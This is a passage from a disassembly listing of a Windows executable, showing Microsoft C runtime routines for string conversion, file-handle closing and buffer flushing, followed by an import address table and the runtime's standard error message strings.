jz short loc_40C197
mov ebx, [ebp+var_34]
cmp ebx, edi
jz short loc_40C13C
push edi
push edi
push [ebp+arg_14]
push ebx
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call dword_40D19C ; WideCharToMultiByte
test eax, eax
jz short loc_40C197
mov [ebp+var_20], ebx
jmp short loc_40C197
; ---------------------------------------------------------------------------
loc_40C13C: ; CODE XREF: sub_40C003+11A�j
cmp [ebp+var_2C], edi
mov ebx, dword_40D19C
jnz short loc_40C15B
push edi
push edi
push edi
push edi
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz short loc_40C197
loc_40C15B: ; CODE XREF: sub_40C003+142�j
push esi
push 1
call sub_409363
cmp eax, edi
pop ecx
pop ecx
mov [ebp+var_20], eax
jz short loc_40C197
push edi
push edi
push esi
push eax
push esi
push [ebp+var_1C]
push edi
push [ebp+arg_4]
call ebx ; WideCharToMultiByte
cmp eax, edi
jnz short loc_40C18C
push [ebp+var_20]
call sub_40405A
pop ecx
mov [ebp+var_20], edi
jmp short loc_40C197
; ---------------------------------------------------------------------------
loc_40C18C: ; CODE XREF: sub_40C003+179�j
cmp [ebp+var_24], 0FFFFFFFFh
jz short loc_40C197
mov ecx, [ebp+var_30]
mov [ecx], eax
loc_40C197: ; CODE XREF: sub_40C003+113�j
; sub_40C003+132�j ...
push [ebp+var_1C]
call sub_40AB04
pop ecx
loc_40C1A0: ; CODE XREF: sub_40C003+38�j
mov eax, [ebp+var_20]
loc_40C1A3: ; CODE XREF: sub_40C003+CA�j
lea esp, [ebp-40h]
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_403F45
leave
retn
sub_40C003 endp
; =============== S U B R O U T I N E =======================================
sub_40C1B5 proc near ; CODE XREF: sub_40BB71+24�p
xor eax, eax
push eax
push eax
push 3
push eax
push 3
push 40000000h
push offset aConout ; "CONOUT$"
call dword_40D0E8 ; CreateFileA
mov dword_411354, eax
retn
sub_40C1B5 endp
; =============== S U B R O U T I N E =======================================
sub_40C1D4 proc near ; DATA XREF: seg001:0040D248�o
mov eax, dword_411354
cmp eax, 0FFFFFFFFh
push esi
mov esi, dword_40D0D0
jz short loc_40C1ED
cmp eax, 0FFFFFFFEh
jz short loc_40C1ED
push eax
call esi ; CloseHandle
loc_40C1ED: ; CODE XREF: sub_40C1D4+F�j
; sub_40C1D4+14�j
mov eax, dword_411350
cmp eax, 0FFFFFFFFh
jz short loc_40C1FF
cmp eax, 0FFFFFFFEh
jz short loc_40C1FF
push eax
call esi ; CloseHandle
loc_40C1FF: ; CODE XREF: sub_40C1D4+21�j
; sub_40C1D4+26�j
pop esi
retn
sub_40C1D4 endp
; =============== S U B R O U T I N E =======================================
sub_40C201 proc near ; CODE XREF: sub_40C273+5A�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edi, edi
or ebx, 0FFFFFFFFh
cmp esi, edi
jnz short loc_40C22D
call sub_403F8F
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_404E8B
add esp, 14h
or eax, ebx
jmp short loc_40C26F
; ---------------------------------------------------------------------------
loc_40C22D: ; CODE XREF: sub_40C201+E�j
test byte ptr [esi+0Ch], 83h
jz short loc_40C26A
push esi
call sub_40BDFC
push esi
mov ebx, eax
call sub_40C592
push esi
call sub_40A6C9
push eax
call sub_40C4C5
add esp, 10h
test eax, eax
jge short loc_40C259
or ebx, 0FFFFFFFFh
jmp short loc_40C26A
; ---------------------------------------------------------------------------
loc_40C259: ; CODE XREF: sub_40C201+51�j
mov eax, [esi+1Ch]
cmp eax, edi
jz short loc_40C26A
push eax
call sub_40405A
pop ecx
mov [esi+1Ch], edi
loc_40C26A: ; CODE XREF: sub_40C201+30�j
; sub_40C201+56�j ...
mov [esi+0Ch], edi
mov eax, ebx
loc_40C26F: ; CODE XREF: sub_40C201+2A�j
pop edi
pop esi
pop ebx
retn
sub_40C201 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C273 proc near ; CODE XREF: sub_40BD5D+43�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_40E7E8
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor eax, eax
mov esi, [ebp+arg_0]
xor edi, edi
cmp esi, edi
setnz al
cmp eax, edi
jnz short loc_40C2B0
call sub_403F8F
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_404E8B
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40C2BC
; ---------------------------------------------------------------------------
loc_40C2B0: ; CODE XREF: sub_40C273+1E�j
test byte ptr [esi+0Ch], 40h
jz short loc_40C2C2
mov [esi+0Ch], edi
loc_40C2B9: ; CODE XREF: sub_40C273+6F�j
mov eax, [ebp+var_1C]
loc_40C2BC: ; CODE XREF: sub_40C273+3B�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_40C2C2: ; CODE XREF: sub_40C273+41�j
push esi
call sub_40A5FF
pop ecx
mov [ebp+ms_exc.disabled], edi
push esi
call sub_40C201
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40C2E7
jmp short loc_40C2B9
sub_40C273 endp
; =============== S U B R O U T I N E =======================================
sub_40C2E4 proc near ; DATA XREF: seg001:0040E800�o
mov esi, [ebp+8]
sub_40C2E4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40C2E7 proc near ; CODE XREF: sub_40C273+6A�p
push esi
call sub_40A669
pop ecx
retn
sub_40C2E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C2EF proc near ; CODE XREF: sub_40BE5E+31�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_40E808
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40C316
call sub_403F8F
mov dword ptr [eax], 9
loc_40C30E: ; CODE XREF: sub_40C2EF+4D�j
or eax, 0FFFFFFFFh
jmp loc_40C3C0
; ---------------------------------------------------------------------------
loc_40C316: ; CODE XREF: sub_40C2EF+12�j
xor ebx, ebx
cmp eax, ebx
jl short loc_40C324
cmp eax, dword_413A68
jb short loc_40C33E
loc_40C324: ; CODE XREF: sub_40C2EF+2B�j
; sub_40C2EF+6D�j
call sub_403F8F
mov dword ptr [eax], 9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_404E8B
add esp, 14h
jmp short loc_40C30E
; ---------------------------------------------------------------------------
loc_40C33E: ; CODE XREF: sub_40C2EF+33�j
mov ecx, eax
sar ecx, 5
lea edi, ds:413A80h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 38h
mov ecx, [edi]
movzx ecx, byte ptr [esi+ecx+4]
and ecx, 1
jz short loc_40C324
push eax
call sub_40BAAF
pop ecx
mov [ebp+ms_exc.disabled], ebx
mov eax, [edi]
test byte ptr [esi+eax+4], 1
jz short loc_40C3A2
push [ebp+arg_0]
call sub_40BA3E
pop ecx
push eax
call dword_40D078 ; FlushFileBuffers
test eax, eax
jnz short loc_40C390
call dword_40D050 ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_40C393
; ---------------------------------------------------------------------------
loc_40C390: ; CODE XREF: sub_40C2EF+94�j
mov [ebp+var_1C], ebx
loc_40C393: ; CODE XREF: sub_40C2EF+9F�j
cmp [ebp+var_1C], ebx
jz short loc_40C3B1
call sub_403FA2
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_40C3A2: ; CODE XREF: sub_40C2EF+80�j
call sub_403F8F
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_40C3B1: ; CODE XREF: sub_40C2EF+A7�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40C3C6
mov eax, [ebp+var_1C]
loc_40C3C0: ; CODE XREF: sub_40C2EF+22�j
call __SEH_epilog4
retn
sub_40C2EF endp
; =============== S U B R O U T I N E =======================================
sub_40C3C6 proc near ; CODE XREF: sub_40C2EF+C9�p
; DATA XREF: seg001:0040E820�o
push dword ptr [ebp+8]
call sub_40BB4F
pop ecx
retn
sub_40C3C6 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+10h]
or ecx, ecx
jz short loc_40C42A
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_40C3EC: ; CODE XREF: seg001:0040C419�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_40C41B
or al, al
jz short loc_40C41B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_40C408
cmp ah, bl
ja short loc_40C408
add ah, dh
loc_40C408: ; CODE XREF: seg001:0040C400�j
; seg001:0040C404�j
cmp al, bh
jb short loc_40C412
cmp al, bl
ja short loc_40C412
add al, dh
loc_40C412: ; CODE XREF: seg001:0040C40A�j
; seg001:0040C40E�j
cmp ah, al
jnz short loc_40C421
sub ecx, 1
jnz short loc_40C3EC
loc_40C41B: ; CODE XREF: seg001:0040C3F2�j
; seg001:0040C3F6�j
xor ecx, ecx
cmp ah, al
jz short loc_40C42A
loc_40C421: ; CODE XREF: seg001:0040C414�j
mov ecx, 0FFFFFFFFh
jb short loc_40C42A
neg ecx
loc_40C42A: ; CODE XREF: seg001:0040C3DB�j
; seg001:0040C41F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40C431 proc near ; CODE XREF: sub_40C4C5+94�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_40BA3E
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_40C490
cmp esi, 1
mov eax, dword_413A80
jnz short loc_40C453
test byte ptr [eax+74h], 1
jnz short loc_40C45E
loc_40C453: ; CODE XREF: sub_40C431+1A�j
cmp esi, 2
jnz short loc_40C474
test byte ptr [eax+3Ch], 1
jz short loc_40C474
loc_40C45E: ; CODE XREF: sub_40C431+20�j
push 2
call sub_40BA3E
push 1
mov edi, eax
call sub_40BA3E
cmp eax, edi
pop ecx
pop ecx
jz short loc_40C490
loc_40C474: ; CODE XREF: sub_40C431+25�j
; sub_40C431+2B�j
push esi
call sub_40BA3E
pop ecx
push eax
call dword_40D0D0 ; CloseHandle
test eax, eax
jnz short loc_40C490
call dword_40D050 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_40C492
; ---------------------------------------------------------------------------
loc_40C490: ; CODE XREF: sub_40C431+10�j
; sub_40C431+41�j ...
xor edi, edi
loc_40C492: ; CODE XREF: sub_40C431+5D�j
push esi
call sub_40B9BD
mov eax, esi
and esi, 1Fh
imul esi, 38h
sar eax, 5
test edi, edi
mov eax, dword_413A80[eax*4]
pop ecx
mov byte ptr [eax+esi+4], 0
jz short loc_40C4C0
push edi
call sub_403FB5
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_40C4C2
; ---------------------------------------------------------------------------
loc_40C4C0: ; CODE XREF: sub_40C431+81�j
xor eax, eax
loc_40C4C2: ; CODE XREF: sub_40C431+8D�j
pop edi
pop esi
retn
sub_40C431 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C4C5 proc near ; CODE XREF: sub_40C201+47�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_40E828
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40C4F4
call sub_403FA2
and dword ptr [eax], 0
call sub_403F8F
mov dword ptr [eax], 9
loc_40C4EC: ; CODE XREF: sub_40C4C5+5C�j
or eax, 0FFFFFFFFh
jmp loc_40C582
; ---------------------------------------------------------------------------
loc_40C4F4: ; CODE XREF: sub_40C4C5+12�j
xor edi, edi
cmp eax, edi
jl short loc_40C502
cmp eax, dword_413A68
jb short loc_40C523
loc_40C502: ; CODE XREF: sub_40C4C5+33�j
; sub_40C4C5+7C�j
call sub_403FA2
mov [eax], edi
call sub_403F8F
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_404E8B
add esp, 14h
jmp short loc_40C4EC
; ---------------------------------------------------------------------------
loc_40C523: ; CODE XREF: sub_40C4C5+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:413A80h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 38h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_40C502
push eax
call sub_40BAAF
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40C564
push [ebp+arg_0]
call sub_40C431
pop ecx
mov [ebp+var_1C], eax
jmp short loc_40C573
; ---------------------------------------------------------------------------
loc_40C564: ; CODE XREF: sub_40C4C5+8F�j
call sub_403F8F
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_40C573: ; CODE XREF: sub_40C4C5+9D�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40C588
mov eax, [ebp+var_1C]
loc_40C582: ; CODE XREF: sub_40C4C5+2A�j
call __SEH_epilog4
retn
sub_40C4C5 endp
; =============== S U B R O U T I N E =======================================
sub_40C588 proc near ; CODE XREF: sub_40C4C5+B5�p
; DATA XREF: seg001:0040E840�o
push dword ptr [ebp+8]
call sub_40BB4F
pop ecx
retn
sub_40C588 endp
; =============== S U B R O U T I N E =======================================
sub_40C592 proc near ; CODE XREF: sub_40C201+3B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_40C5BC
test al, 8
jz short loc_40C5BC
push dword ptr [esi+8]
call sub_40405A
and dword ptr [esi+0Ch], 0FFFFFBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_40C5BC: ; CODE XREF: sub_40C592+A�j
; sub_40C592+E�j
pop esi
retn
sub_40C592 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C5BE proc near ; CODE XREF: sub_407F5A+10�p
; seg001:0040AC27�p
jmp dword_40D17C
sub_40C5BE endp
; ---------------------------------------------------------------------------
dd 28Fh dup(0)
dword_40D000 dd 77DE138Bh ; DATA XREF: seg001:0040380D�r
; seg001:0040E854�o
dword_40D004 dd 77DE7E48h ; DATA XREF: seg001:004036C3�r
; seg001:00403813�r
dword_40D008 dd 77E2BF4Bh ; DATA XREF: sub_403540+6C�r
dword_40D00C dd 77E2BE75h ; DATA XREF: sub_403540+78�r
dword_40D010 dd 77DE8075h ; DATA XREF: sub_403450+52�r
; sub_403540+D7�r
dword_40D014 dd 77DD23D7h ; DATA XREF: seg001:004033FE�r
dword_40D018 dd 77DD5C55h ; DATA XREF: seg001:0040340E�r
dword_40D01C dd 77DDA20Bh ; DATA XREF: sub_4032F0+B�r
; sub_403450+B�r ...
dword_40D020 dd 77DDAB2Fh ; DATA XREF: sub_4032F0+11�r
; sub_403450+11�r ...
dword_40D024 dd 77DE801Bh ; DATA XREF: sub_4032F0+29�r
; sub_403450+26�r ...
dword_40D028 dd 77E2BC20h ; DATA XREF: sub_4032F0+4B�r
; sub_403450+47�r ...
dword_40D02C dd 77DE1291h ; DATA XREF: sub_4032F0+56�r
; seg001:00403524�r
dword_40D030 dd 77E2C1B3h ; DATA XREF: sub_4032F0+5D�r
dword_40D034 dd 77DE09ECh ; DATA XREF: sub_4032F0+7B�r
dword_40D038 dd 77DD22EAh ; DATA XREF: sub_402E60+29�r
; seg001:004033E0�r
dword_40D03C dd 77DD59F0h ; DATA XREF: sub_402E60+97�r
dword_40D040 dd 77DD189Ah ; DATA XREF: sub_402E60+A1�r
; seg001:00403426�r
dword_40D044 dd 77DE1EBDh ; DATA XREF: sub_4038C0+F5�r
dd 7FFFFFFFh
dword_40D04C dd 77E78EAAh ; DATA XREF: sub_403150+FC�r
; seg001:off_40E844�o
dword_40D050 dd 77F5157Dh ; DATA XREF: sub_403150+CB�r
; seg001:004037D3�r ...
dword_40D054 dd 77E74CABh ; DATA XREF: sub_403150+6D�r
dword_40D058 dd 77E75E67h ; DATA XREF: sub_403150+5E�r
; sub_403150+EC�r
dword_40D05C dd 77E75D9Eh ; DATA XREF: sub_403150+48�r
dword_40D060 dd 77E705B0h ; DATA XREF: seg001:0040329E�r
; sub_4038C0+3E�r
dword_40D064 dd 77E79A45h ; DATA XREF: sub_4032F0+91�r
dword_40D068 dd 77E79881h ; DATA XREF: sub_4032F0+6A�r
dword_40D06C dd 77E73BEFh ; DATA XREF: sub_403540+BC�r
dword_40D070 dd 77E7C2C4h ; DATA XREF: seg001:004037C9�r
; seg001:00403875�r
dword_40D074 dd 77E78C17h ; DATA XREF: sub_4038C0+16�r
dword_40D078 dd 77E73FF9h ; DATA XREF: sub_40C2EF+8C�r
dword_40D07C dd 77E704DCh ; DATA XREF: sub_403150+103�r
dword_40D080 dd 77E76052h ; DATA XREF: sub_40BB71+45�r
dword_40D084 dd 77E795BFh ; DATA XREF: sub_40BB71+78�r
dword_40D088 dd 77E99078h ; DATA XREF: sub_40BB71+9B�r
dword_40D08C dd 77E7FF2Eh ; DATA XREF: sub_40B9BD:loc_40BA15�r
dword_40D090 dd 77E7C866h ; DATA XREF: sub_40B130+2D�r
; sub_40B130+11C�r
dword_40D094 dd 77E641EBh ; DATA XREF: sub_40B130+191�r
dword_40D098 dd 77E781F9h ; DATA XREF: sub_40AD4B+30�r
; sub_40AD4B+144�r ...
dword_40D09C dd 77E77405h ; DATA XREF: sub_40AD4B+294�r
; sub_40AD4B+365�r
dword_40D0A0 dd 77E7513Ch ; DATA XREF: sub_40BFBC+22�r
dword_40D0A4 dd 77EBB1E7h ; DATA XREF: sub_4039FA�r
dword_40D0A8 dd 77EBA595h ; DATA XREF: sub_4039F4�r
dword_40D0AC dd 77E706B7h ; DATA XREF: sub_403040+58�r
dword_40D0B0 dd 77E616B4h ; DATA XREF: sub_403040+BC�r
; sub_404D8F+E0�r ...
dword_40D0B4 dd 77E79D5Bh ; DATA XREF: sub_403040+C9�r
dword_40D0B8 dd 77EBA6E9h ; DATA XREF: sub_4039EE�r
dword_40D0BC dd 77E73628h ; DATA XREF: sub_403040+EF�r
; sub_403150+C1�r ...
dword_40D0C0 dd 77E705C5h ; DATA XREF: sub_402F20+53�r
dword_40D0C4 dd 77E6808Fh ; DATA XREF: sub_402F20+5F�r
dword_40D0C8 dd 77E6BD13h ; DATA XREF: sub_402F20+74�r
dword_40D0CC dd 77E61BB8h ; DATA XREF: sub_402F20+DA�r
dword_40D0D0 dd 77E77963h ; DATA XREF: sub_402F20+E8�r
; sub_403040+32�r ...
dword_40D0D4 dd 77E75CB5h ; DATA XREF: sub_402F20+FA�r
; sub_404279+E�r
dword_40D0D8 dd 77E80656h ; DATA XREF: sub_402040+6C�r
; sub_409287+41�r
dword_40D0DC dd 77E7AC37h ; DATA XREF: sub_402040+E0�r
dword_40D0E0 dd 77E7A099h ; DATA XREF: seg001:00401F94�r
; sub_402E60+41�r ...
dword_40D0E4 dd 77E684C6h ; DATA XREF: seg001:00402026�r
dword_40D0E8 dd 77E7A837h ; DATA XREF: sub_40C1B5+13�r
dword_40D0EC dd 77E61BE6h ; DATA XREF: seg001:00401693�r
; sub_401E40+17�r ...
dword_40D0F0 dd 77E77CCEh ; DATA XREF: sub_40AD4B:loc_40ADF8�r
; sub_40B130:loc_40B1B3�r ...
dword_40D0F4 dd 77F522F2h ; DATA XREF: sub_40A965+82�r
dword_40D0F8 dd 77F516F8h ; DATA XREF: sub_403B17+F�r
; seg001:00404BCD�r ...
dword_40D0FC dd 77F51597h ; DATA XREF: sub_40405A+68�r
; seg001:00404BF9�r ...
dword_40D100 dd 77E7A5FDh ; DATA XREF: sub_404253+15�r
; sub_406255+54�r ...
dword_40D104 dd 77E79F93h ; DATA XREF: sub_404253+5�r
; sub_4061E9+28�r ...
dword_40D108 dd 77E7C938h ; DATA XREF: seg001:loc_404CA8�r
dword_40D10C dd 77E7C657h ; DATA XREF: seg001:00404BE9�r
dword_40D110 dd 77E77CB7h ; DATA XREF: seg001:00404BC4�r
dword_40D114 dd 77E6177Ah ; DATA XREF: seg001:00404BAF�r
; sub_409047+15�r
dword_40D118 dd 77E79C90h ; DATA XREF: sub_404D8F+D9�r
; sub_4060E5+F5�r
dword_40D11C dd 77EB9A84h ; DATA XREF: sub_404D8F+BE�r
; sub_4060E5+D9�r ...
dword_40D120 dd 77E7C9E7h ; DATA XREF: sub_404D8F+B4�r
; sub_4060E5+CE�r ...
dword_40D124 dd 77E72E92h ; DATA XREF: sub_404D8F+AA�r
; sub_4060E5+B9�r
dword_40D128 dd 77F53275h ; DATA XREF: sub_404FF4+1�r
; sub_40BD5D+62�r
dword_40D12C dd 77F7E300h ; DATA XREF: sub_405049+D�r
; sub_40A669+2F�r ...
dword_40D130 dd 77F7E21Fh ; DATA XREF: sub_405121+28�r
; sub_40A5FF+34�r ...
dword_40D134 dd 77E79E34h ; DATA XREF: sub_4051C5+22F�r
dword_40D138 dd 77E7980Ah ; DATA XREF: sub_4054D9+77�r
; sub_405589+52�r
dword_40D13C dd 77F5722Fh ; DATA XREF: sub_4054D9+27�r
; sub_40B7A2+134�r ...
dword_40D140 dd 77E76E0Bh ; DATA XREF: sub_405D08+47�r
dword_40D144 dd 77E7C726h ; DATA XREF: sub_405D08+11�r
dword_40D148 dd 77E79D8Ch ; DATA XREF: sub_405D62+194�r
; sub_409DE4+212�r ...
dword_40D14C dd 77E79C3Dh ; DATA XREF: sub_405D62+169�r
; sub_409047+1B5�r
dword_40D150 dd 77E78B61h ; DATA XREF: sub_406255+7�r
; sub_4062CC+7�r ...
dword_40D154 dd 77E7C5B4h ; DATA XREF: sub_40633A�r
; sub_406621:loc_4066C0�r
dword_40D158 dd 77E79B39h ; DATA XREF: sub_406343+28�r
; sub_406621+58�r
dword_40D15C dd 77E72B29h ; DATA XREF: sub_406375+2B�r
; sub_406621+85�r
dword_40D160 dd 77E777EFh ; DATA XREF: sub_4063B2+77�r
; sub_408199+84�r ...
dword_40D164 dd 77F51587h ; DATA XREF: sub_406471+6C�r
; sub_407B1C+AB�r
dword_40D168 dd 77E77CC4h ; DATA XREF: sub_406471+54�r
; sub_406621+169�r ...
dword_40D16C dd 77E778C5h ; DATA XREF: sub_406500+90�r
; sub_408199+59�r ...
dword_40D170 dd 77E6167Bh ; DATA XREF: sub_4067A5+9�r
; sub_409287+35�r
dword_40D174 dd 77E805D8h ; DATA XREF: sub_409765+2D�r
dword_40D178 dd 77E79908h ; DATA XREF: seg001:00407B10�r
dword_40D17C dd 77F6183Eh ; DATA XREF: sub_40C5BE�r
dword_40D180 dd 77E7849Fh ; DATA XREF: sub_40800F+24�r
; sub_4082B7+84�r ...
dword_40D184 dd 77E7A13Fh ; DATA XREF: sub_40823D+4A�r
dword_40D188 dd 77E6C703h ; DATA XREF: sub_40823D+27�r
dword_40D18C dd 77E75243h ; DATA XREF: sub_4082B7+71�r
dword_40D190 dd 77E9C5B1h ; DATA XREF: sub_408F12+10F�r
; sub_408F12+126�r
dword_40D194 dd 77E67702h ; DATA XREF: sub_408F12:loc_408FF0�r
dword_40D198 dd 77E7C9E1h ; DATA XREF: sub_408F12+CC�r
dword_40D19C dd 77E79924h ; DATA XREF: sub_408F12:loc_408F8C�r
; sub_409DE4+1EF�r ...
dword_40D1A0 dd 77E77EE1h ; DATA XREF: sub_408F12+B�r
dword_40D1A4 dd 77E7C931h ; DATA XREF: sub_409047+21F�r
dword_40D1A8 dd 77E78406h ; DATA XREF: sub_409047+12B�r
; sub_409047+1C7�r
dword_40D1AC dd 77E802FCh ; DATA XREF: sub_409287+5D�r
dword_40D1B0 dd 77E7751Ah ; DATA XREF: sub_409287+51�r
dword_40D1B4 dd 77E78C81h ; DATA XREF: sub_409C48+40�r
dword_40D1B8 dd 77EC80CCh ; DATA XREF: sub_409DE4:loc_409F1D�r
dword_40D1BC dd 77E79540h ; DATA XREF: sub_409DE4+11D�r
dd 7FFFFFFFh
dword_40D1C4 dd 76BF1D54h ; DATA XREF: sub_403A72�r
; seg001:0040E85C�o
dd 0FFFFFFFFh
dword_40D1CC dd 71AB41DAh ; DATA XREF: sub_403A6C�r
; seg001:0040E84C�o
dword_40D1D0 dd 71AB1444h ; DATA XREF: sub_403A66�r
dword_40D1D4 dd 71AB1ED3h ; DATA XREF: sub_403A60�r
dword_40D1D8 dd 71AB1A6Dh ; DATA XREF: sub_403A5A�r
dword_40D1DC dd 71AB5690h ; DATA XREF: sub_403A54�r
dword_40D1E0 dd 71AB1AF4h ; DATA XREF: sub_403A4E�r
dword_40D1E4 dd 71AB868Dh ; DATA XREF: sub_403A48�r
dword_40D1E8 dd 71AB5DE2h ; DATA XREF: sub_403A42�r
dword_40D1EC dd 71AB155Ah ; DATA XREF: sub_403A36�r
dword_40D1F0 dd 71AB3E5Dh ; DATA XREF: sub_403A30�r
dword_40D1F4 dd 71AB1740h ; DATA XREF: sub_403A2A�r
dword_40D1F8 dd 71AB1746h ; DATA XREF: sub_403A24�r
dword_40D1FC dd 71AB3F8Dh ; DATA XREF: sub_403A1E�r
dword_40D200 dd 71AB3ECEh ; DATA XREF: sub_403A18�r
dword_40D204 dd 71AB1890h ; DATA XREF: sub_403A12�r
dword_40D208 dd 71AB1B7Bh ; DATA XREF: sub_403A0C�r
dword_40D20C dd 71AB12F8h ; DATA XREF: sub_403A06�r
dword_40D210 dd 71AB2BBFh ; DATA XREF: sub_403A00�r
dword_40D214 dd 71AB3C22h ; DATA XREF: sub_403A3C�r
dd 7FFFFFFFh
dword_40D21C dd 0 ; DATA XREF: sub_40434B+49�o
dword_40D220 dd 0 ; DATA XREF: sub_40434B+50�o
dword_40D224 dd 0 ; DATA XREF: sub_40434B+2D�o
dd offset sub_4060D1
dd offset sub_407512
dd offset sub_40862A
dd offset sub_409B3C
dd offset sub_40A52E
dd offset sub_408B7B
dword_40D240 dd 0 ; DATA XREF: sub_40434B+28�o
dword_40D244 dd 0 ; DATA XREF: sub_4043DD+87�o
dd offset sub_40C1D4
dd offset sub_40A5DF
dword_40D250 dd 0 ; DATA XREF: sub_4043DD:loc_40445F�o
dword_40D254 dd 0 ; DATA XREF: sub_4043DD+97�o
dword_40D258 dd 2 dup(0) ; DATA XREF: sub_4043DD:loc_40446F�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_404253+F�o
align 10h
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_404253�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 10h
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 10h
aSingError db 'SING error',0Dh,0Ah,0
align 10h
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6034AnApplica db 'R6034',0Dh,0Ah
db 'An application has made an attempt to load the C runtime library '
db 'incorrectly.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6033AttemptTo db 'R6033',0Dh,0Ah
db '- Attempt to use MSIL code from this assembly during native code '
db 'initialization',0Ah
db 'This indicates a bug in your application. It is most likely the r'
db 'esult of calling an MSIL-compiled (/clr) function from a native c'
db 'onstructor or from DllMain.',0Dh,0Ah,0
align 4
aR6032NotEnough db 'R6032',0Dh,0Ah
db '- not enough space for locale information',0Dh,0Ah,0
align 10h
aR6031AttemptTo db 'R6031',0Dh,0Ah
db '- Attempt to initialize the CRT more than once.',0Ah
db 'This indicates a bug in your application.',0Dh,0Ah,0
align 4
aR6030CrtNotIni db 'R6030',0Dh,0Ah
db '- CRT not initialized',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: seg001:off_41070C�o
db '- floating point support not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_405D62+157�o
align 10h
